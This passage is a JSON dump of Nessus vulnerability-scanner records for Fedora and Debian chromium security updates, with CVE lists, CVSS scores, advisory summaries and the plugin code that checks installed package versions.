\"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\", \"CVE-2019-5881\");\n script_xref(name:\"FEDORA\", 
value:\"2019-2fa7552273\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Fedora 30 : chromium (2019-2fa7552273)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721 \n\n----\n\nChromium 78. \n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874\nCVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876\nCVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881\nCVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662\nCVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666\nCVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670\nCVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675\nCVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679\nCVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-2fa7552273\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2019-5878\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-78.0.3904.87-1.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:32:16", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and CVE-2019-13721 \n\n----\n\nChromium 78. \n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874 CVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876 CVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881 CVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662 CVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666 CVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670 CVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675 CVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679 CVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-11-15T00:00:00", "type": "nessus", "title": "Fedora 29 : chromium (2019-8508d74523)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-8508D74523.NASL", "href": "https://www.tenable.com/plugins/nessus/131043", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2019-8508d74523.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131043);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-13659\",\n \"CVE-2019-13660\",\n \"CVE-2019-13661\",\n \"CVE-2019-13662\",\n \"CVE-2019-13663\",\n \"CVE-2019-13664\",\n \"CVE-2019-13665\",\n \"CVE-2019-13666\",\n \"CVE-2019-13667\",\n \"CVE-2019-13668\",\n \"CVE-2019-13669\",\n \"CVE-2019-13670\",\n \"CVE-2019-13671\",\n \"CVE-2019-13673\",\n \"CVE-2019-13674\",\n \"CVE-2019-13675\",\n \"CVE-2019-13676\",\n \"CVE-2019-13677\",\n \"CVE-2019-13678\",\n \"CVE-2019-13679\",\n \"CVE-2019-13680\",\n \"CVE-2019-13681\",\n \"CVE-2019-13682\",\n \"CVE-2019-13683\",\n \"CVE-2019-13691\",\n \"CVE-2019-13692\",\n \"CVE-2019-13720\",\n \"CVE-2019-13721\",\n \"CVE-2019-5870\",\n \"CVE-2019-5871\",\n \"CVE-2019-5872\",\n \"CVE-2019-5874\",\n \"CVE-2019-5875\",\n \"CVE-2019-5876\",\n \"CVE-2019-5877\",\n \"CVE-2019-5878\",\n \"CVE-2019-5879\",\n \"CVE-2019-5880\",\n \"CVE-2019-5881\"\n );\n script_xref(name:\"FEDORA\", value:\"2019-8508d74523\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Fedora 29 : chromium (2019-8508d74523)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721 \n\n----\n\nChromium 78. 
\n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874\nCVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876\nCVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881\nCVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662\nCVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666\nCVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670\nCVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675\nCVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679\nCVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-8508d74523\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5878\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-78.0.3904.87-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:31:48", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-5869 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5870 Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-5871 A buffer overflow issue was discovered in the skia library.\n\n - CVE-2019-5872 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5874 James Lee discovered an issue with external Uniform Resource Identifiers.\n\n - CVE-2019-5875 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-5876 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-5877 Guang Gong discovered an out-of-bounds read issue.\n\n - CVE-2019-5878 Guang Gong discovered an use-after-free issue in the v8 JavaScript library.\n\n - CVE-2019-5879 Jinseo Kim discover that extensions could read files on the local system.\n\n - CVE-2019-5880 Jun Kokatsu discovered a way to bypass the SameSite cookie feature.\n\n - CVE-2019-13659 Lnyas Zhang discovered a URL spoofing issue.\n\n - CVE-2019-13660 Wenxu Wu discovered a user interface error in full screen mode.\n\n - CVE-2019-13661 Wenxu Wu discovered 
a user interface spoofing issue in full screen mode.\n\n - CVE-2019-13662 David Erceg discovered a way to bypass the Content Security Policy.\n\n - CVE-2019-13663 Lnyas Zhang discovered a way to spoof Internationalized Domain Names.\n\n - CVE-2019-13664 Thomas Shadwell discovered a way to bypass the SameSite cookie feature.\n\n - CVE-2019-13665 Jun Kokatsu discovered a way to bypass the multiple file download protection feature.\n\n - CVE-2019-13666 Tom Van Goethem discovered an information leak.\n\n - CVE-2019-13667 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13668 David Erceg discovered an information leak.\n\n - CVE-2019-13669 Khalil Zhani discovered an authentication spoofing issue.\n\n - CVE-2019-13670 Guang Gong discovered a memory corruption issue in the v8 JavaScript library.\n\n - CVE-2019-13671 xisigr discovered a user interface error.\n\n - CVE-2019-13673 David Erceg discovered an information leak.\n\n - CVE-2019-13674 Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\n - CVE-2019-13675 Jun Kokatsu discovered a way to disable extensions.\n\n - CVE-2019-13676 Wenxu Wu discovered an error in a certificate warning.\n\n - CVE-2019-13677 Jun Kokatsu discovered an error in the chrome web store.\n\n - CVE-2019-13678 Ronni Skansing discovered a spoofing issue in the download dialog window.\n\n - CVE-2019-13679 Conrad Irwin discovered that user activation was not required for printing.\n\n - CVE-2019-13680 Thijs Alkamade discovered an IP address spoofing issue.\n\n - CVE-2019-13681 David Erceg discovered a way to bypass download restrictions.\n\n - CVE-2019-13682 Jun Kokatsu discovered a way to bypass the site isolation feature.\n\n - CVE-2019-13683 David Erceg discovered an information leak.\n\n - CVE-2019-13685 Khalil Zhani discovered a use-after-free issue.\n\n - CVE-2019-13686 Brendon discovered a use-after-free issue.\n\n - CVE-2019-13687 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13688 Man Yue Mo 
discovered a use-after-free issue.\n\n - CVE-2019-13691 David Erceg discovered a user interface spoofing issue.\n\n - CVE-2019-13692 Jun Kokatsu discovered a way to bypass the Same Origin Policy.\n\n - CVE-2019-13693 Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-13694 banananapenguin discovered a use-after-free issue.\n\n - CVE-2019-13695 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13696 Guang Gong discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2019-13697 Luan Herrera discovered an information leak.\n\n - CVE-2019-13699 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13700 Man Yue Mo discovered a buffer overflow issue.\n\n - CVE-2019-13701 David Erceg discovered a URL spoofing issue.\n\n - CVE-2019-13702 Phillip Langlois and Edward Torkington discovered a privilege escalation issue in the installer.\n\n - CVE-2019-13703 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13704 Jun Kokatsu discovered a way to bypass the Content Security Policy.\n\n - CVE-2019-13705 Luan Herrera discovered a way to bypass extension permissions.\n\n - CVE-2019-13706 pdknsk discovered an out-of-bounds read issue in the pdfium library.\n\n - CVE-2019-13707 Andrea Palazzo discovered an information leak.\n\n - CVE-2019-13708 Khalil Zhani discovered an authentication spoofing issue.\n\n - CVE-2019-13709 Zhong Zhaochen discovered a way to bypass download restrictions.\n\n - CVE-2019-13710 bernardo.mrod discovered a way to bypass download restrictions.\n\n - CVE-2019-13711 David Erceg discovered an information leak.\n\n - CVE-2019-13713 David Erceg discovered an information leak.\n\n - CVE-2019-13714 Jun Kokatsu discovered an issue with Cascading Style Sheets.\n\n - CVE-2019-13715 xisigr discovered a URL spoofing issue.\n\n - CVE-2019-13716 Barron Hagerman discovered an error in the service worker implementation.\n\n - CVE-2019-13717 xisigr discovered a user interface spoofing issue.\n\n - CVE-2019-13718 Khalil 
Zhani discovered a way to spoof Internationalized Domain Names.\n\n - CVE-2019-13719 Khalil Zhani discovered a user interface spoofing issue.\n\n - CVE-2019-13720 Anton Ivanov and Alexey Kulaev discovered a use-after-free issue.\n\n - CVE-2019-13721 banananapenguin discovered a use-after-free issue in the pdfium library.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-11-12T00:00:00", "type": "nessus", "title": "Debian DSA-4562-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13685", "CVE-2019-13686", "CVE-2019-13687", "CVE-2019-13688", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13693", "CVE-2019-13694", "CVE-2019-13695", 
"CVE-2019-13696", "CVE-2019-13697", "CVE-2019-13699", "CVE-2019-13700", "CVE-2019-13701", "CVE-2019-13702", "CVE-2019-13703", "CVE-2019-13704", "CVE-2019-13705", "CVE-2019-13706", "CVE-2019-13707", "CVE-2019-13708", "CVE-2019-13709", "CVE-2019-13710", "CVE-2019-13711", "CVE-2019-13713", "CVE-2019-13714", "CVE-2019-13715", "CVE-2019-13716", "CVE-2019-13717", "CVE-2019-13718", "CVE-2019-13719", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5869", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4562.NASL", "href": "https://www.tenable.com/plugins/nessus/130774", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4562. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130774);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\", \"CVE-2019-13685\", \"CVE-2019-13686\", \"CVE-2019-13687\", \"CVE-2019-13688\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-13693\", \"CVE-2019-13694\", \"CVE-2019-13695\", \"CVE-2019-13696\", \"CVE-2019-13697\", \"CVE-2019-13699\", \"CVE-2019-13700\", \"CVE-2019-13701\", \"CVE-2019-13702\", \"CVE-2019-13703\", \"CVE-2019-13704\", \"CVE-2019-13705\", \"CVE-2019-13706\", \"CVE-2019-13707\", \"CVE-2019-13708\", \"CVE-2019-13709\", \"CVE-2019-13710\", \"CVE-2019-13711\", \"CVE-2019-13713\", \"CVE-2019-13714\", \"CVE-2019-13715\", \"CVE-2019-13716\", \"CVE-2019-13717\", \"CVE-2019-13718\", \"CVE-2019-13719\", \"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5869\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\");\n script_xref(name:\"DSA\", value:\"4562\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Debian DSA-4562-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n 
attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-5869\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5870\n Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-5871\n A buffer overflow issue was discovered in the skia\n library.\n\n - CVE-2019-5872\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5874\n James Lee discovered an issue with external Uniform\n Resource Identifiers.\n\n - CVE-2019-5875\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-5876\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-5877\n Guang Gong discovered an out-of-bounds read issue.\n\n - CVE-2019-5878\n Guang Gong discovered an use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2019-5879\n Jinseo Kim discover that extensions could read files on\n the local system.\n\n - CVE-2019-5880\n Jun Kokatsu discovered a way to bypass the SameSite\n cookie feature.\n\n - CVE-2019-13659\n Lnyas Zhang discovered a URL spoofing issue.\n\n - CVE-2019-13660\n Wenxu Wu discovered a user interface error in full\n screen mode.\n\n - CVE-2019-13661\n Wenxu Wu discovered a user interface spoofing issue in\n full screen mode.\n\n - CVE-2019-13662\n David Erceg discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2019-13663\n Lnyas Zhang discovered a way to spoof Internationalized\n Domain Names.\n\n - CVE-2019-13664\n Thomas Shadwell discovered a way to bypass the SameSite\n cookie feature.\n\n - CVE-2019-13665\n Jun Kokatsu discovered a way to bypass the multiple file\n download protection feature.\n\n - CVE-2019-13666\n Tom Van Goethem discovered an information leak.\n\n - CVE-2019-13667\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13668\n David Erceg discovered an information leak.\n\n - 
CVE-2019-13669\n Khalil Zhani discovered an authentication spoofing\n issue.\n\n - CVE-2019-13670\n Guang Gong discovered a memory corruption issue in the\n v8 JavaScript library.\n\n - CVE-2019-13671\n xisigr discovered a user interface error.\n\n - CVE-2019-13673\n David Erceg discovered an information leak.\n\n - CVE-2019-13674\n Khalil Zhani discovered a way to spoof Internationalized\n Domain Names.\n\n - CVE-2019-13675\n Jun Kokatsu discovered a way to disable extensions.\n\n - CVE-2019-13676\n Wenxu Wu discovered an error in a certificate warning.\n\n - CVE-2019-13677\n Jun Kokatsu discovered an error in the chrome web store.\n\n - CVE-2019-13678\n Ronni Skansing discovered a spoofing issue in the\n download dialog window.\n\n - CVE-2019-13679\n Conrad Irwin discovered that user activation was not\n required for printing.\n\n - CVE-2019-13680\n Thijs Alkamade discovered an IP address spoofing issue.\n\n - CVE-2019-13681\n David Erceg discovered a way to bypass download\n restrictions.\n\n - CVE-2019-13682\n Jun Kokatsu discovered a way to bypass the site\n isolation feature.\n\n - CVE-2019-13683\n David Erceg discovered an information leak.\n\n - CVE-2019-13685\n Khalil Zhani discovered a use-after-free issue.\n\n - CVE-2019-13686\n Brendon discovered a use-after-free issue.\n\n - CVE-2019-13687\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13688\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13691\n David Erceg discovered a user interface spoofing issue.\n\n - CVE-2019-13692\n Jun Kokatsu discovered a way to bypass the Same Origin\n Policy.\n\n - CVE-2019-13693\n Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-13694\n banananapenguin discovered a use-after-free issue.\n\n - CVE-2019-13695\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13696\n Guang Gong discovered a use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2019-13697\n Luan Herrera discovered an information leak.\n\n - 
